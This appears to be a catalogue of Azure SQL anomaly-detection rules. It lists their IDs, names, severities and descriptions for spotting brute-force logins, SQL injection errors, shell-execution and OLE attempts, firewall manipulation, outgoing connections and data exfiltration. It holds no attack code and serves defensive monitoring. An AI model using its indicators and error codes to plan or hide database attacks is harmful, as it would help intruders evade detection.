Back Id 2a632013-379d-4993-956f-615063d31e10 Rulename Affected rows stateful anomaly on database Description Goal: To detect anomalous data change/deletion. This query detects SQL queries that changed/deleted a large number of rows, which is significantly higher than normal for this database.
The detection is calculated inside recent time window (defined by ‘detectionWindow’ parameter), and the anomaly is calculated based on previous training window (defined by ’trainingWindow’ parameter). The user can set the minimal threshold for anomaly by changing the threshold parameters volThresholdZ and volThresholdQ (higher threshold will detect only more severe anomalies).
Back Id daa32afa-b5b6-427d-93e9-e32f3f359dd7 Rulename Credential errors stateful anomaly on database Description This query batches of distinct SQL queries that failed with error codes that might indicate malicious attempts to gain illegitimate access to the data. When Brute Force attacks are attempted, majority of logins will use wrong credentials, thus will fail with error code 18456. Thus, if we see a large number of logins with such error codes, this could indicate Brute Force attack.
Back Id 237c3855-138c-4588-a68f-b870abd3bfc9 Rulename Drop attempts stateful anomaly on database Description This query detects batches of distinct SQL queries that execute (or attempt to) commands that could indicate potential security issues - such as attempts to drop tables or databases (e.g. for data vandalism). Severity Medium Tactics InitialAccess Techniques T1190 Required data connectors AzureSql Kind Scheduled Query frequency 1h Query period 14d Trigger threshold 0 Trigger operator gt Source Uri https://github.
Back Id 3367fd5e-44b3-4746-a9a5-dc15c8202490 Rulename Execution attempts stateful anomaly on database Description This query detects batches of distinct SQL queries that execute (or attempt to) commands that could indicate potential security issues - such as attempts to execute shell commands (e.g. for running illegitimate code). Severity Medium Tactics InitialAccess Techniques T1190 Required data connectors AzureSql Kind Scheduled Query frequency 1h Query period 14d Trigger threshold 0 Trigger operator gt Source Uri https://github.
Back Id 20f87813-3de0-4a9f-a8c0-6aaa3187be08 Rulename Firewall errors stateful anomaly on database Description This query batches of distinct SQL queries that failed with error codes that might indicate malicious attempts to gain illegitimate access to the data. When attacker attempts to scan or gain access to server protected by firewall, he will be blocked by firewall and fail with error code 40615. Thus, if we see a large number of logins with such error codes, this could indicate attempts to gain access.
Back Id 05030ca6-ef66-42ca-b672-2e84d4aaf5d7 Rulename Firewall rule manipulation attempts stateful anomaly on database Description This query detects batches of distinct SQL queries that execute (or attempt to) commands that could indicate potential security issues - such as attempts to manipulate firewall rules (e.g. for allowing malicious access to the database). Severity Medium Tactics InitialAccess Techniques T1190 Required data connectors AzureSql Kind Scheduled Query frequency 1h Query period 14d Trigger threshold 0 Trigger operator gt Source Uri https://github.
Back Id dabd7284-004b-4237-b5ee-a22acab19eb2 Rulename OLE object manipulation attempts stateful anomaly on database Description This query detects batches of distinct SQL queries that execute (or attempt to) commands that could indicate potential security issues - such as attempts to manipulate OLE objects (e.g. for running malicious commands). Severity Medium Tactics InitialAccess Techniques T1190 Required data connectors AzureSql Kind Scheduled Query frequency 1h Query period 14d Trigger threshold 0 Trigger operator gt Source Uri https://github.
Back Id c105513d-e398-4a02-bd91-54b9b2d6fa7d Rulename Outgoing connection attempts stateful anomaly on database Description This query detects batches of distinct SQL queries that execute (or attempt to) commands that could indicate potential security issues - such as attempts to access external sites or resources (e.g. for downloading malicious content). Severity Medium Tactics InitialAccess Techniques T1190 Required data connectors AzureSql Kind Scheduled Query frequency 1h Query period 14d Trigger threshold 0 Trigger operator gt Source Uri https://github.
Back Id 9851c360-5fd5-4bae-a117-b66d8476bf5e Rulename Response rows stateful anomaly on database Description Goal: To detect anomalous data exfiltration. This query detects SQL queries that accessed a large number of rows, which is significantly higher than normal for this database.
The calculation is made inside recent time window (defined by ‘detectionWindow’ parameter), and the anomaly is calculated based on previous training window (defined by ’trainingWindow’ parameter). The user can set the minimal threshold for anomaly by changing the threshold parameters volThresholdZ and volThresholdQ (higher thresholds will detect only more severe anomalies).
Back Id c815008d-f4d1-4645-b13b-8b4bc188d5de Rulename Syntax errors stateful anomaly on database Description This query batches of distinct SQL queries that failed with error codes that might indicate malicious attempts to gain illegitimate access to the data. When blind type of attacks are performed (such as SQL injection of fuzzying), the attempted queries are often malformed and fail on wrong syntax (error 102) or wrong escaping (error 105). Thus, if a large number of different queries fail on such errors in a short amount of time, this might indicate attempted attack.
